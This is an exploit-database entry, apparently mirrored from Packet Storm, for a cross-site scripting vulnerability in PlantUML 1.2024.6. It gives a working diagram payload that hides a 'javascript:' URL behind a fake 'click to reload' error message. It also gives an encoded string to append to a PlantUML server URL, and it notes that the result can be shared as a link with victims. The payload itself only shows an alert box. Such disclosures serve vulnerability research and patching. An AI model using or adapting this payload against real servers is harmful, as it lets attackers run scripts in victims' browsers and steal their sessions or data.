## https://sploitus.com/exploit?id=PACKETSTORM:180344
#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)
#Date: 23/08/2024
#Exploit Author: Hosein Vita
#Vendor Homepage: https://plantuml.com/
#Version: 1.2024.6
#Tested on: Linux
Description:
This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.
Proof of Concept:
plantuml
Copy code
@startuml
digraph G {
graph [bgcolor="white"];
node [shape=box, style="rounded,filled", color="white"];
heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];
}
@enduml
Alternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:
Copy code
PK-xJWGn3Epv2YiLI64FMcwJ3cWe41BLYiBP-3Ovh6JbDIyX_fr450XHUFoOiJoEUH5S4zp2vmd0Jps5PQvSnPctb9NCqxvHfKQ2QKkuaWlrtSAc7qpEI7qfaQ8zP6QAniB_rKGOSrbWwfe_j0N6GEp6KJ4mGQWIgR4N1cPY_ctzgD8Y0d9UYZDC1pN-MgGAdCCDvdORj09NR3bHSr6KYWvZa9s_PyAjpJZFprqbr7N3CEuq-WRIeHlmtiBZmvqpHtp5RPQywXKoYPvUdktxCr_V
This proof-of-concept remains stored and can be shared as a link with potential victims.